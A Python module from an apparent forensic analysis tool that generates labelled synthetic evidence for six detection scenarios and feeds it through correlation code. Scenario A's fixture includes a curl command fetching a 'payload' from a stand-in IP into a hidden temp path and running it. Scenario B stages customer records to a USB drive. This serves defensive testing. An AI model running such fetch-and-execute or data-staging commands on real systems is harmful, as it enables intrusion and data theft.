"""
Synthetic evidence for six lab scenarios.

Each scenario is a function that returns collector-shaped evidence with fixed
timestamps and fixed hashes, so the same scenario always produces the same
findings and a test can assert on them exactly.

The evidence is shaped like real collector output but is not real. Two things
keep that visible at every layer: every event's `source` begins with SYNTHETIC,
and every record carries `synthetic: True`. A scenario is never written into a
real investigation without that marker travelling with it.
"""

from __future__ import annotations

import hashlib
from datetime import datetime, timedelta, timezone

from analysis.execution_model import (
    ARTIFACT_OBSERVATION, COMMAND_HISTORY, EXECUTION_EVIDENCE, HISTORICAL_EVIDENCE, MODERATE,
    SESSION_EVENT, STRONG, build_event,
)

SYNTHETIC_BANNER = (
    "SYNTHETIC LAB DATA -- This evidence was generated by JOCKY for demonstration and testing. "
    "It did not come from any real machine and must never be presented as if it did.")

#: A fixed point in time so a scenario is reproducible run to run.
EPOCH = datetime(2026, 3, 14, 9, 0, tzinfo=timezone.utc)


def _at(minutes: int) -> str:
    return (EPOCH + timedelta(minutes=minutes)).isoformat()


def _digest(label: str) -> str:
    """A stable fake hash. Derived from the label so it never collides."""
    return hashlib.sha256(f"jocky-synthetic::{label}".encode()).hexdigest()


def _event(source, minutes, **kwargs):
    observed = kwargs.pop("observed", {})
    event = build_event(
        source=f"SYNTHETIC {source}", source_record_id=f"syn-{source}-{minutes}",
        timestamp=_at(minutes), classification=HISTORICAL_EVIDENCE,
        evidence_strength=kwargs.pop("strength", STRONG), provenance=SYNTHETIC_BANNER,
        evidence_kind=kwargs.pop("kind", EXECUTION_EVIDENCE),
        execution_confirmed=kwargs.pop("confirmed", True), observed=observed,
        raw={"synthetic": True}, **kwargs)
    event["synthetic"] = True
    return event


def _artifact(path, *, label=None, size=4096, minutes=0, source="SYNTHETIC artifact collection"):
    filename = path.rsplit("/", 1)[-1]
    return {
        "path": path, "filename": filename,
        "extension": ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else None,
        "source": source, "size_bytes": size, "modified": _at(minutes), "created": _at(minutes),
        "hash": _digest(label or path), "hash_algorithm": "sha256",
        "collection_status": "COLLECTED", "indicators": [], "synthetic": True,
    }


def _result(name, title, question, *, events=(), artifacts=(), extra=None, expected=""):
    return {
        "scenario": name, "title": title, "investigative_question": question,
        "synthetic": True, "banner": SYNTHETIC_BANNER, "expected_outcome": expected,
        "execution": {
            "status": "success", "classification": HISTORICAL_EVIDENCE, "synthetic": True,
            "events": list(events), "complete": True,
            "sources": [{"name": "SYNTHETIC lab generator", "status": "AVAILABLE",
                         "detail": SYNTHETIC_BANNER}],
            "warnings": [SYNTHETIC_BANNER],
        },
        "artifacts": {"artifacts": list(artifacts), "synthetic": True, "complete": True,
                      "statistics": {"collected": len(artifacts)}, "warnings": [SYNTHETIC_BANNER]},
        **(extra or {}),
    }


# --- Scenario A ---------------------------------------------------------------
def scenario_a() -> dict:
    """An executable with an unusual name, in an unusual place, that ran."""
    path = "/tmp/.cache/svchost-update"
    events = [
        _event("shell history", 0, kind=COMMAND_HISTORY, confirmed=False, strength=MODERATE,
               observed={"process_name": "curl", "user": "analyst",
                         "full_command_line": f"curl -o {path} http://198.51.100.24/payload",
                         "command_line": f"curl -o {path} http://198.51.100.24/payload"}),
        _event("kernel audit log", 2,
               observed={"process_name": "chmod", "executable": "/usr/bin/chmod", "pid": 4821,
                         "parent_process": "bash", "user": "analyst",
                         "full_command_line": f"chmod +x {path}",
                         "command_line": f"chmod +x {path}"}),
        _event("kernel audit log", 3,
               observed={"process_name": "svchost-update", "executable": path, "pid": 4830,
                         "parent_process": "bash", "parent_pid": 2201, "user": "analyst",
                         "full_command_line": path, "command_line": path,
                         "hash": _digest(path)}),
    ]
    return _result(
        "A", "Suspicious execution from a hidden temporary directory",
        "Did an unusual executable run, and is the file still on disk?",
        events=events, artifacts=[_artifact(path, minutes=1, size=284160)],
        expected=("A Priority 1 lead: execution from a user-writable location, confirmed as having "
                  "run, with a hashed artifact at the same path. A Windows service name under "
                  "/tmp/.cache is a reason to look, not a verdict."))


# --- Scenario B ---------------------------------------------------------------
def scenario_b() -> dict:
    """Removable media attached, files written to it, an archive built first."""
    mount = "/media/analyst/FIELDKIT"
    events = [
        _event("systemd journal", 10, kind=SESSION_EVENT, confirmed=False, strength=MODERATE,
               observed={"process_name": "kernel", "user": "root",
                         "full_command_line": "usb 1-3: new high-speed USB device",
                         "command_line": "usb 1-3: new high-speed USB device"}),
        _event("kernel audit log", 12,
               observed={"process_name": "tar", "executable": "/usr/bin/tar", "pid": 5120,
                         "parent_process": "bash", "user": "analyst",
                         "full_command_line": "tar -czf /tmp/customer-records.tar.gz /srv/records",
                         "command_line": "tar -czf /tmp/customer-records.tar.gz /srv/records"}),
        _event("kernel audit log", 14,
               observed={"process_name": "cp", "executable": "/usr/bin/cp", "pid": 5133,
                         "parent_process": "bash", "user": "analyst",
                         "full_command_line":
                             f"cp /tmp/customer-records.tar.gz {mount}/customer-records.tar.gz",
                         "command_line":
                             f"cp /tmp/customer-records.tar.gz {mount}/customer-records.tar.gz"}),
    ]
    usb = {
        "status": "success", "classification": "CURRENT_OBSERVATION", "synthetic": True,
        "complete": True, "warnings": [SYNTHETIC_BANNER],
        "devices": [{"serial": "AA7712FF0931", "vendor": "Kingston", "product": "DataTraveler 3.0",
                     "removable": "removable", "synthetic": True}],
        "events": [{"timestamp": _at(10), "action": "connected", "device": "Kingston DataTraveler",
                    "serial": "AA7712FF0931", "synthetic": True},
                   {"timestamp": _at(21), "action": "disconnected", "device": "Kingston DataTraveler",
                    "serial": "AA7712FF0931", "synthetic": True}],
        "mounts": [{"device": "/dev/sdb1", "mount_point": mount, "filesystem": "vfat",
                    "synthetic": True}],
        "limits": {"media_contents_read": False},
    }
    return _result(
        "B", "Data staged to removable media",
        "Was data collected and written to a device that was then removed?",
        events=events,
        artifacts=[_artifact("/tmp/customer-records.tar.gz", minutes=12, size=48_210_944),
                   _artifact(f"{mount}/customer-records.tar.gz", label="/tmp/customer-records.tar.gz",
                             minutes=14, size=48_210_944)],
        extra={"usb": usb},
        expected=("One activity thread linking the archive, the copy and the device window. The "
                  "two artifacts share a hash, which is what a copy looks like."))


# --- Scenario C ---------------------------------------------------------------
def scenario_c() -> dict:
    """A download, the file it produced, and the file being run."""
    path = "/home/analyst/Downloads/network-tool.sh"
    events = [
        _event("shell history", 30, kind=COMMAND_HISTORY, confirmed=False, strength=MODERATE,
               observed={"process_name": "bash", "user": "analyst",
                         "full_command_line": f"bash {path}", "command_line": f"bash {path}"}),
        _event("kernel audit log", 31,
               observed={"process_name": "bash", "executable": "/usr/bin/bash", "pid": 6011,
                         "parent_process": "gnome-terminal", "user": "analyst",
                         "interpreter": "bash", "full_command_line": f"bash {path}",
                         "command_line": f"bash {path}", "hash": _digest(path)}),
    ]
    browser = {
        "status": "success", "classification": "HISTORICAL_EVIDENCE", "synthetic": True,
        "complete": True, "warnings": [SYNTHETIC_BANNER],
        "profiles": [{"browser": "firefox", "profile": "synthetic.default", "synthetic": True}],
        "history": [{"url": "http://203.0.113.77/tools/", "title": "tools index",
                     "visited_at": _at(27), "profile": "synthetic.default", "synthetic": True}],
        "downloads": [{"url": "http://203.0.113.77/tools/network-tool.sh", "target_path": path,
                       "started_at": _at(28), "bytes": 9182, "profile": "synthetic.default",
                       "synthetic": True}],
        "limits": {"passwords_read": False, "cookies_read": False, "tokens_read": False},
    }
    return _result(
        "C", "Downloaded script executed shortly after download",
        "Was a file obtained from the web and then run?",
        events=events, artifacts=[_artifact(path, minutes=28, size=9182)],
        extra={"browser": browser},
        expected=("Browser, artifact and execution evidence for one path, correlated across three "
                  "sources with the download three minutes before the run."))


# --- Scenario D ---------------------------------------------------------------
def scenario_d() -> dict:
    """The same file on two hosts, reached a different way on each."""
    path = "/opt/vendor-agent/sync-helper"
    shared = _digest("cross-host-sync-helper")

    def host(name, minutes, parent):
        return {
            "endpoint": name,
            "execution": {"status": "success", "classification": HISTORICAL_EVIDENCE,
                          "complete": True, "synthetic": True, "warnings": [SYNTHETIC_BANNER],
                          "events": [_event("kernel audit log", minutes, observed={
                              "process_name": "sync-helper", "executable": path, "pid": 7000 + minutes,
                              "parent_process": parent, "user": "root",
                              "full_command_line": f"{path} --sync", "command_line": f"{path} --sync",
                              "hash": shared})]},
            "artifacts": {"artifacts": [dict(_artifact(path, minutes=minutes - 1), hash=shared,
                                             sha256=shared)],
                          "complete": True, "synthetic": True, "statistics": {"collected": 1},
                          "warnings": [SYNTHETIC_BANNER]},
            "network": {"status": "success", "classification": "CURRENT_OBSERVATION",
                        "synthetic": True, "complete": True, "warnings": [SYNTHETIC_BANNER],
                        "connections": [{"remote_address": "198.51.100.44", "remote_port": 8443,
                                         "status": "ESTABLISHED", "process_name": "sync-helper",
                                         "synthetic": True}],
                        "limits": {"packet_capture": False}},
        }

    hosts = [host("SYNTHETIC-LAB-A", 40, "systemd"), host("SYNTHETIC-LAB-B", 55, "cron")]
    return _result(
        "D", "The same binary running on two hosts",
        "Does an observable appear on more than one machine in this case?",
        events=hosts[0]["execution"]["events"] + hosts[1]["execution"]["events"],
        artifacts=hosts[0]["artifacts"]["artifacts"] + hosts[1]["artifacts"]["artifacts"],
        extra={"hosts": hosts, "shared_hash": shared},
        expected=("Cross-host correlation on the shared file hash and the shared remote address. "
                  "That the same file is in two places is a fact; whether it is vendor software or "
                  "something else is not decided here."))


# --- Scenario E ---------------------------------------------------------------
def scenario_e() -> dict:
    """A memory image result, with its fixture provenance attached.

    The rows below are shaped exactly as Volatility3's windows.pslist emits
    them and go through the real normalizer, so this scenario exercises the
    same path a genuine image would rather than a convenient stand-in.
    """
    from analysis.memory import analyze_memory_image

    memory = analyze_memory_image(fixture={"processes": [
        {"PID": 4, "PPID": 0, "ImageFileName": "System"},
        {"PID": 668, "PPID": 4, "ImageFileName": "smss.exe"},
        {"PID": 1204, "PPID": 668, "ImageFileName": "explorer.exe"},
        # The parent of this one is absent from the image on purpose.
        {"PID": 3390, "PPID": 2884, "ImageFileName": "updater-service.exe"},
    ]})
    memory["synthetic"] = True
    memory["warnings"] = list(memory.get("warnings", [])) + [SYNTHETIC_BANNER]
    for process in memory["processes"]:
        process["synthetic"] = True
    return _result(
        "E", "Memory image with a process whose parent is absent",
        "What was running when the image was taken, and does anything lack a parent?",
        extra={"memory": memory},
        expected=("Normalized memory processes plus an orphan-process finding, both labelled as "
                  "coming from a fixture so they cannot be read as evidence about a host."))


# --- Scenario F ---------------------------------------------------------------
def scenario_f() -> dict:
    """A loaded driver whose hash is in the known-abused reference."""
    from analysis.drivers import load_reference

    reference = load_reference()
    known_hash, known_name = None, "synthetic-known.sys"
    for digest, record in (reference.get("by_hash") or {}).items():
        known_hash = digest
        known_name = (record.get("name") if isinstance(record, dict) else None) or known_name
        break

    drivers = {
        "status": "success", "classification": "CURRENT_OBSERVATION", "synthetic": True,
        "complete": True, "warnings": [SYNTHETIC_BANNER],
        "reference": {"available": bool(known_hash), "source": reference.get("source"),
                      "entry_count": reference.get("entry_count")},
        "drivers": [
            {"name": "ext4", "path": "/lib/modules/synthetic/ext4.ko", "kind": "linux_module",
             "sha256": _digest("ext4"), "synthetic": True,
             "verification": {"risk_status": "UNKNOWN", "confidence": "none",
                              "detail": "Not present in the reference."}},
            {"name": known_name, "path": f"C:\\\\Windows\\\\System32\\\\drivers\\\\{known_name}",
             "kind": "windows_driver", "sha256": known_hash, "synthetic": True,
             "verification": {"risk_status": "MATCHED" if known_hash else "UNKNOWN",
                              "confidence": "high" if known_hash else "none",
                              "matched_on": "sha256",
                              "detail": ("Synthetic driver deliberately given a hash from the "
                                         "known-abused reference.")}},
        ],
        "limits": {"drivers_loaded_or_modified": False},
    }
    return _result(
        "F", "A driver matching the known-abused reference is loaded",
        "Is any loaded driver one that has been abused elsewhere?",
        extra={"drivers": drivers},
        expected=("A high-severity, explainable driver finding naming the rule that fired, stating "
                  "that presence is not proof of abuse on this host."))


SCENARIOS = {
    "A": scenario_a, "B": scenario_b, "C": scenario_c,
    "D": scenario_d, "E": scenario_e, "F": scenario_f,
}


def list_scenarios() -> list:
    return [{"scenario": key, "title": build(  ).get("title"),
             "question": build().get("investigative_question"),
             "expected_outcome": build().get("expected_outcome")}
            for key, build in SCENARIOS.items()]


def build_scenario(name: str) -> dict:
    key = (name or "").strip().upper()
    if key not in SCENARIOS:
        raise KeyError(f"Unknown scenario '{name}'. Available: {', '.join(SCENARIOS)}")
    return SCENARIOS[key]()


def run_scenario(name: str) -> dict:
    """Build a scenario and push it through the real analysis pipeline.

    The analysis code is not told that the evidence is synthetic and gets no
    special path: the point of a scenario is to exercise exactly what a real
    collection exercises.
    """
    from analysis.activity import assign_references, build_activity, build_leads
    from analysis.correlation import correlate
    from analysis.cross_source import correlate_sources
    from analysis.detections import detect
    from analysis.fleet_correlation import correlate_fleet
    from analysis.threads import build_threads
    from analysis.timeline import build_timeline

    scenario = build_scenario(name)
    execution, artifacts = scenario["execution"], scenario["artifacts"]
    assign_references(execution.get("events", []), artifacts=artifacts.get("artifacts", []))
    correlation = correlate(execution=execution, artifacts=artifacts, processes={})
    findings = (correlation["findings"]
                + detect(drivers=scenario.get("drivers"), memory=scenario.get("memory"))
                + correlate_sources(execution=execution, artifacts=artifacts,
                                    browser=scenario.get("browser"), usb=scenario.get("usb")))
    activity = build_activity(execution.get("events", []), artifacts=artifacts.get("artifacts", []))
    threads = build_threads(activity["groups"])
    timeline = build_timeline(execution=execution, artifacts=artifacts, processes={},
                              findings=findings, transitions=[])
    # A multi-host scenario is only meaningful through the fleet comparison, so
    # its per-host evidence is presented to that code exactly as a real endpoint
    # result would be.
    fleet = None
    if scenario.get("hosts"):
        tasks, endpoints = [], []
        for index, host in enumerate(scenario["hosts"], start=1):
            endpoint_id = f"EP-SYNTHETIC-{index}"
            endpoints.append({"id": endpoint_id, "name": host["endpoint"]})
            for source in ("execution", "artifacts", "network"):
                tasks.append({"endpoint_id": endpoint_id, "status": "succeeded",
                              "source": source.upper(), "result": host[source]})
        fleet = correlate_fleet(tasks, endpoints=endpoints)

    ranked = sorted(findings, key=lambda finding: finding["priority_rank"])
    leads = build_leads(activity["groups"])
    return {
        "scenario": scenario["scenario"], "title": scenario["title"],
        "fleet_correlation": fleet,
        "highest_finding_priority": ranked[0]["priority_label"] if ranked else None,
        "highest_lead_priority": (
            leads[0]["priority_label"] if leads else None),
        "banner": SYNTHETIC_BANNER, "synthetic": True,
        "investigative_question": scenario["investigative_question"],
        "expected_outcome": scenario["expected_outcome"],
        "event_count": len(execution.get("events", [])),
        "artifact_count": len(artifacts.get("artifacts", [])),
        "findings": findings, "activity": activity, "threads": threads,
        "timeline": timeline, "correlation": correlation,
        "leads": leads,
        "source": scenario,
    }
